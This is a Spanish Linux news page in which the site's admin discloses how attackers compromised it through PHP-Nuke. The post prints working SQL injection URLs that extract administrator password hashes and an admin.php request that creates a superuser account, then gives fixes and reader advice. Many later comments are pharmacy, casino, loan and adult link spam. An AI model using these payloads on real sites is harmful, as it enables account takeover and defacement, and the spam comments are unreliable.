Crear una cuenta	Inicio Foros Tu Cuenta Enviar Noticias Top 15 Buscar

:: Todo-Linux.com Inicio Noticias Enviar Noticias Recomiéndanos Alta/Configuración Nuestro Top 15 FAQ Miembros Todo-Linuxeros Foro Todo-Linux Todo-Linux en ingles Listas de Correo Formato PDA Sección Manuales Test de Velocidad ADSL Nos enlazan desde... Contáctanos Publicidad Todo-Linuxeros Usuario Password Codigo de Seguridad: Tipea Codigo de Seguridad Si aún no eres usuario de todo-linux puedes crear una cuenta· 118 curiosos · 0 todo-linuxeros eth1 516.66 kbit/s TLServer Almacén de ideas [ Software en General ] · CCNT ha desarrollado un sistema de gestión asistencial utilizando tecnología NFC · El número de proyectos con GPLv3 llega a los 2.000 · La industria del software indio crece un 33 por ciento · El software no está a la altura de los microprocesadores · Excelente lista de Software Windows vs Linux · Otro cumple: EL CD · Un IDE para el web 2.0 · Telefonia Internet en Firefox · cdlibre.org - Nuevas recopilaciones de software :: lawebdelostrucos.com ·claves empires ·como capturar a mew · ·trucazo zona safari ·truco de gta vice city de pc ·como abrir las puertas de los 3 regirock en rubi ·COMO SACAR A REGICE ·como llevar a tus pokemons al nivel 100 o infinito ·como conseguir ha mew ·Tienes preguntas de los movimientos de alguien en Bloody Roar 2? Leer más... Tiras Cómicas Rulito el Freak.. Tira Ecol... Tira LH... Newsletter Todo-Linux Subscripción por email Powered by FeedBlitz Tuxhuellas

Agujero de seguridad en PHPNUKE - Así hackeron Todo-Linux esta mañana Enviado el Monday, 23 February a las 15:36:24 por ShaDoW Como ya sabeis Todo-Linux ha sido hackeado ésta mañana (hora Española 6:00). Despues de analizar el ataque, hemos comprobado que muchisimas paginas PHPNUKE son vulnerables a dicho ataque, a continuacion, enumeramos a grandes rasgos las sentencias que nos han ejecutado para hackear el site... aqui os explicamos todo al detalle En primero lugar, se puede obtener una sentencia SQL con la password del administrador principal del sitio web con esta orden: /modules.php?name=Sections&op=viewarticle&artid=-1%20UNION%20SELECT%200,0,aid,pwd,0%20FROM%20nuke_authors Tambien se pueden sacar más datos asi: /modules.php?name=Reviews&rop=showcontent&id=-1%20UNION%20SELECT%200,0,aid,pwd,email,email,100,pwd,url,url,10000,name%20FROM%20nuke_authors/* Una vez obtenida la password del usuario ROOT, podemos crearnos una cuenta de superusuario: /admin.php?op=AddAuthor&add_radminsuper=1&add_name=TLTLTL&add_aid=TLTLTL&add_email=soymuymalo@mixmail.com&add_pwd=12345&admin= Una vez tenemos una cuenta con dichos privilegios, el site es nuestro y podemos hacer lo que queramos. Nosotros, para corregir el problema, hemos puesto una autentificaion previa a admin.pp, os lo recomiendo, tambien hemos desactivado los modulos que no usabamos (deberiamos haberlos desactivado hace mucho tiempo) y hemos modificado un fallo en el modulo de galerias, tal y como dijimos hace unas horas. ¿Conoceis algun parche para plicarlo y solucionar todos estos problemas de seguridad? ¿Conoceis mas fallos de seguridad graves?. Saludos a TODOS. Fdo. ShaDoW Nota: ¿Que os parece todo esto?. Éste enlace nos lo ha enviado nuestro amigo Xombra. http://www.xombra.com/go_news.php?articulo=1506   Enlaces Relacionados · Más Acerca de Todo-Linux General · Noticias de ShaDoW Noticia más leída sobre Todo-Linux General: Agujero de seguridad en PHPNUKE - Así hackeron Todo-Linux esta mañana Votos del Artículo Puntuación Promedio: 5 votos: 4 Por favor tómate un segundo y vota por este artículo: Opciones    Versión Imprimible    Enviar a un Amigo "Registrate" | Entrar/Crear Cuenta | 40 Comentarios | Buscar Discusión Puntos -1 0 1 2 3 4 5 Sin Comentarios Anidados Plano Discusión Viejos Primero Nuevos Primero Mayor Puntuación Primero Los comentarios son propiedad de quien los envió. No somos responsables por su contenido. No se permiten comentarios Anónimos, Regístrese por favor Re: Agujero de seguridad en PHPNUKE - Así hackeron Todo-Linux esta mañana (Puntuación 0) por TodoLinuxero el Monday, 23 February a las 21:13:05 cómo se pone una autentificación previa al admin.php???? AYUDA POR FAVOR omarpax@hotmail.com Re: Agujero de seguridad en PHPNUKE - Así hackeron Todo-Linux esta mañana por ShaDoW el Monday, 23 February a las 21:42:51 Re: Agujero de seguridad en PHPNUKE - Así hackeron Todo-Linux esta mañana (Puntuación 0) por TodoLinuxero el Tuesday, 24 February a las 04:32:13 Buenas noches, Para que no os vuelva a pasar este tipo de cosas os recomiendo el mod_security, http://www.modsecurity.org/ donde podéis filtrar sentencias SQL y ataques tipo a la aplicación Web. AlbertG Re: Agujero de seguridad en PHPNUKE - Así hackeron Todo-Linux esta mañana (Puntuación 0) por TodoLinuxero el Tuesday, 24 February a las 11:39:15 Amigos Soy el Webmaster de xombra.com, es realidad lamento lo que ha ocurrido a ustedes. Pero sepan que no son Hackers lo que atacan a sitios como el suyo, son solo unos niños con ganas de "joder" (lease:lammers) Hace poco en mi sitio un miembro envio este articulo de como tapar unos de los muchos huecos que tiene el php-nuke. Tal vez le sirva de algo. Esta demás decirles que estamos a sus entera disposición. http://www.xombra.com/go_news.php?artic Leer el resto del comentario... Re: Agujero de seguridad en PHPNUKE - Así hackeron Todo-Linux esta mañana por ShaDoW el Tuesday, 24 February a las 11:44:51 Re: Agujero de seguridad en PHPNUKE - Así hackeron Todo-Linux esta mañana (Puntuación 1) por _Aik_ el Tuesday, 24 February a las 16:46:01 (Información del Usuario | Enviar un Mensaje) http://www.programo.com Hay un paquete que soluciona diversos bugs de seguridad en las últimas versiones de PHP-Nuke. Se puede descargar la versión para PHP-Nuke 7.1 en: http://www.nukeresources.com/files/71patched.zip Si tienes otra versión cambis el 71 del nombre por la versión que tengas Ejemplo para la 7.0: http://www.nukeresources.com/files/70patched.zip Soluciona este error y otros muchos. Re: Agujero de seguridad en PHPNUKE - Así hackeron Todo-Linux esta mañana (Puntuación 1) por under23 el Tuesday, 24 February a las 20:19:14 (Información del Usuario | Enviar un Mensaje) bueno antes que todo muy buenas tarde spues no se aque hora sean alal en españa pero aki es la tarde y pues viendo el problema que paso leyendo las noticias desidi pues poner mi opinion sobre el tema pues lo que opina "xombra" y pues e estado pensando en dos o tres cosas que quisiera plantiarselas pues ando medio dudoso de cosas . y son estas: 1: x que llamar lammer a una persona ? 2: x que reconocer a una persona que iso un "deface" aun sitio como"lammer" 3:x que se compara car Leer el resto del comentario... Re: Agujero de seguridad en PHPNUKE - Así hackeron Todo-Linux esta mañana por Etig0L el Wednesday, 25 February a las 09:54:29 Re: Agujero de seguridad en PHPNUKE - Así hackeron Todo-Linux esta mañana por _Aik_ el Wednesday, 25 February a las 11:08:33 Re: Agujero de seguridad en PHPNUKE - Así hackeron Todo-Linux esta mañana por TodoLinuxero el Wednesday, 25 February a las 16:49:58 Re: Agujero de seguridad en PHPNUKE - Así hackeron Todo-Linux esta mañana por TodoLinuxero el Friday, 27 February a las 00:37:50 Re: Agujero de seguridad en PHPNUKE - Así hackeron Todo-Linux esta mañana por TodoLinuxero el Monday, 04 April a las 15:40:38 Re: Agujero de seguridad en PHPNUKE - Así hackeron Todo-Linux esta mañana por TodoLinuxero el Wednesday, 13 April a las 03:24:11 normal (Puntuación 0) por TodoLinuxero el Thursday, 26 February a las 13:44:52 Eso pasa por usar *NUKE, porque es muy pesado ver tanto sitio ya igual, y logicamente, salen muchos bugs. Apoyo a los webmasters que se lo curran por ellos mismos. un saludo Parche y posible solución. (Puntuación 0) por TodoLinuxero el Thursday, 26 February a las 16:01:59 Pues si que habría una "posible solución"; que el señor que creó esto, lo abrió, y lo volvió a cerrar por aquello de "la pelota es mía y se juega a fútbol, baloncesto, o lo que me rote según mi conveniencia", lo vuelva a abrir otra vez de manera que no esté él solito programando código, y no pasen cosas como estas (somos humanos señores...). Re: Agujero de seguridad en PHPNUKE - Así hackeron Todo-Linux esta mañana (Puntuación 0) por TodoLinuxero el Thursday, 26 February a las 16:21:36 Hombre, teniendo en cuenta que este fallo en el php-nuke se conoce desde que el php-nuke salió pues no se, seguramente sea que no existe parche. Y el único parche que conozco es aprender a programar, diseñar vuestro propio portal, así tendreis solo lo que usais y no tendriais que estar desactivando cosas. Ese es el unico parche que puedo asegurar que funciona. Re: Agujero de seguridad en PHPNUKE - Así hackeron Todo-Linux esta mañana por TodoLinuxero el Thursday, 26 February a las 17:46:39 Re: Agujero de seguridad en PHPNUKE - Así hackeron Todo-Linux esta mañana por TodoLinuxero el Friday, 27 February a las 00:06:30 Re: Agujero de seguridad en PHPNUKE - Así hackeron Todo-Linux esta mañana por TodoLinuxero el Friday, 27 February a las 06:33:49 Re: Agujero de seguridad en PHPNUKE - Así hackeron Todo-Linux esta mañana (Puntuación 0) por TodoLinuxero el Friday, 28 May a las 21:00:38 Pero que es lo que habés protegido con autentificación, ¿too el directorio admin? Perdona, pero no me ha quedado del todo claro. Re: Agujero de seguridad en PHPNUKE - Así hackeron Todo-Linux esta mañana (Puntuación 0) por TodoLinuxero el Friday, 21 January a las 18:58:04 para poner una autorizacion previa debes poner en el archivo admin.php arriba de todo, al principio, esto: tenes q cambiar el usuario y el password por el q deseas y listo salu2 =) desde argentina =) poker games (Puntuación 1) por oliiviiaadams el Wednesday, 24 May a las 21:39:30 (Información del Usuario | Enviar un Mensaje) poker [poker.src21.net] - poker online poker [online-poker.src21.net] - online poker texas hold em [online-poker.src21.net] - texas hold em online casino [internet-poker.src21.net] - online casino casino games [poker.src21.net] - casino game Leer el resto del comentario... equity loan (Puntuación 1) por oliiviiaadams el Saturday, 27 May a las 02:25:57 (Información del Usuario | Enviar un Mensaje) loans [loans.src21.net] - loans refinancing [refinancing.src21.net] - refinancing lenders [lenders.src21.net] - lenders auto loan [loans.src21.net] - auto loan loan [refinancing.src21.net] - loan mortgage loans [lenders.src21 Leer el resto del comentario... polyphonic ringtones download (Puntuación 1) por oliiviiaadams el Monday, 29 May a las 22:13:40 (Información del Usuario | Enviar un Mensaje) Webdesign [aboutvideoor.blogspot.com] - Webdesign Video Clips [aboutvideoor.blogspot.com] - Video Clips cingular wap [acingularwapwhen.blogspot.com] - cingular wap buy allegra [inbuyallegrathat.blogspot.com] - buy allegra tunica poker tournament [ent Leer el resto del comentario... viagra (Puntuación 1) por trraacyheeath el Wednesday, 21 June a las 19:46:47 (Información del Usuario | Enviar un Mensaje) viagra [onviagrain.blogspot.com] - viagra viagra [onviagrain.blogspot.com] - viagra viagra [onviagrain.blogspot.com] - viagra viagra [onviagrain.blogspot.com] - viagra viagra [onviagrain.blogspot.com] - viagra viagra [onvia Leer el resto del comentario... viagra (Puntuación 1) por trraacyheeath el Monday, 26 June a las 23:11:56 (Información del Usuario | Enviar un Mensaje) military loans [wheremilitaryloansabout.blogspot.com] - military loans buy tramadol [thebuytramadolit.blogspot.com] - buy tramadol deuces free game poker wild [fordeucesfreegamepokerwildan.blogspot.com] - deuces free game poker wild auto loans [onautoloansthis.blogspot.com] - auto loa Leer el resto del comentario... sean paul (Puntuación 1) por trraacyheeath el Saturday, 08 July a las 08:24:24 (Información del Usuario | Enviar un Mensaje) bonus casino sign up [itbonuscasinosignupor.blogspot.com] - bonus casino sign up weight loss [whatweightlosswww.blogspot.com] - weight loss poker tips [wwwpokertipsto.blogspot.com] - poker tips forex uk [whenforexukin.blogspot.com] - forex uk backgammon Leer el resto del comentario... viagra (Puntuación 1) por trraacyheeath el Tuesday, 18 July a las 14:22:34 (Información del Usuario | Enviar un Mensaje) forex investments [onforexinvestmentsit.blogspot.com] - forex investments cheap celexa [withcheapcelexafor.blogspot.com] - cheap celexa credit cards [atcreditcardsfor.blogspot.com] - credit cards refinance [undrefinancecom.blogspot.com] - refinance Leer el resto del comentario... yahoo back door backgammon (Puntuación 1) por trraacyheeath el Monday, 31 July a las 15:38:41 (Información del Usuario | Enviar un Mensaje) unsecured loans bad credit [aunsecuredloansbadcredit.blogspot.com] - unsecured loans bad credit atlantis casino reno resort [aatlantiscasinorenoresort.blogspot.com] - atlantis casino reno resort backgammon fish game jelly [atbackgammonfishgamejellyof.blogspot.com] - backgammon fish game jellyLeer el resto del comentario... online backgammon (Puntuación 1) por trraacyheeath el Wednesday, 02 August a las 14:41:37 (Información del Usuario | Enviar un Mensaje) military loans [anmilitaryloans.blogspot.com] - military loans forex currency [laforexcurrencyas.blogspot.com] - forex currency backgammon table [undbackgammontablewhere.blogspot.com] - backgammon table ca casino pala [wwwcacasinopalathe.blogspot.com] - ca casino palaLeer el resto del comentario... frog ringtone (Puntuación 1) por trraacyheeath el Thursday, 03 August a las 15:04:27 (Información del Usuario | Enviar un Mensaje) ringtones for samsung [toringtonesforsamsungthat.blogspot.com] - ringtones for samsung day trading schools [fordaytradingschoolsbe.blogspot.com] - day trading schools auto car loans [wwwautocarloansen.blogspot.com] - auto car loans backgammon set [labackgammonsetby.blogspot.com] - back Leer el resto del comentario... pay day loans (Puntuación 1) por trraacyheeath el Thursday, 17 August a las 11:06:41 (Información del Usuario | Enviar un Mensaje) payday loans [pay-day-loans.ddo.jp] - payday loans sprint ringtones [springtones.ddo.jp] - sprint ringtones verizon ringtones [veringtone.ddo.jp] - verizon ringtones college loans [coloans.ddo.jp] - college loans cingular ringtones [ciringtones.ddo.jp] - cingular ringtones ba Leer el resto del comentario... zoloft (Puntuación 1) por trraacyheeath el Tuesday, 22 August a las 02:15:32 (Información del Usuario | Enviar un Mensaje) forex forum [wwwforexforumas.blogspot.com] - forex forum web design [aboutwebdesignby.blogspot.com] - web design commercial loans [undcommercialloans.blogspot.com] - commercial loans casino hard rock [whatcasinohardrockwho.blogspot.com] - casino hard rockLeer el resto del comentario... online casino (Puntuación 1) por trraacyheeath el Tuesday, 12 December a las 14:02:54 (Información del Usuario | Enviar un Mensaje) payday loans [psycommunity.bangor.ac.uk] - payday loans singulair [www.physics.purdue.edu] - singulair internet poker [njcste.kean.edu] - internet poker Leer el resto del comentario... nexium (Puntuación 1) por trraacyheeath el Thursday, 11 January a las 20:41:58 (Información del Usuario | Enviar un Mensaje) lopressor [comlopressora.blogspot.com] - lopressor webhost [wherewebhostthat.blogspot.com] - webhost cheap acyclovir [lacheapacyclovirthat.blogspot.com] - cheap acyclovir bob marley real tones [whobobmarleyrealtonesen.blogspot.com] - bob marley real tones Leer el resto del comentario... furniture patio (Puntuación 1) por trraacyheeath el Friday, 19 January a las 06:41:30 (Información del Usuario | Enviar un Mensaje) internet backgammon [blog.myspace.com] - internet backgammon play online backgammon [blog.myspace.com] - play online backgammon internet backgammon [blog.myspace.com] - internet backgammon personal loans [blog.myspace.com] - personal loans Leer el resto del comentario... maps (Puntuación 1) por trraacyheeath el Monday, 22 January a las 11:28:51 (Información del Usuario | Enviar un Mensaje) internet casino [blog.myspace.com] - internet casino payday loans [blog.myspace.com] - payday loans title loans [blog.myspace.com] - title loans online casino [blog.myspace.com] - online casino equity loans [blog.myspace.com] - Leer el resto del comentario... coumadin (Puntuación 1) por trraacyheeath el Tuesday, 13 March a las 19:11:49 (Información del Usuario | Enviar un Mensaje) downloadable ringtones [fromdownloadableringtonesthe.blogspot.com] - downloadable ringtones backgammon e mail [labackgammonemailthe.blogspot.com] - backgammon e mail casino in island mn treasure [whocasinoinislandmntreasureor.blogspot.com] - casino in island mn treasure f Leer el resto del comentario... cipro (Puntuación 1) por trraacyheeath el Monday, 09 July a las 00:44:36 (Información del Usuario | Enviar un Mensaje) iran sex [www.vanhpc.org] - iran sex adult sex dating [tes.uab.es] - adult sex dating teen ***** [www.mainemarketingassociation.org] - teen ***** Leer el resto del comentario... Re: Agujero de seguridad en PHPNUKE - Así hackeron Todo-Linux esta mañana (Puntuación 1) por Conde Overos el Sunday, 09 December a las 19:39:34 (Información del Usuario | Enviar un Mensaje) http://www.saharalibre.es Al viernes recibi un ataque por inyeccion de SQL y lo primero que vi es que el prefijo de las tablas era un standart en las web hechas con phpnuke. Si se desconoce el prefijo de las tablas no se pueden hacer consultas contra la base de datos y no se pueden obtener los hash de las pass y no se puede atacar la web por este metodo. php Nuke recomienda (en el config.php) cambiar el prefijo de las tablas de la base de datos para darle mayor seguridad a la web. Seguro Leer el resto del comentario... Aviso Legal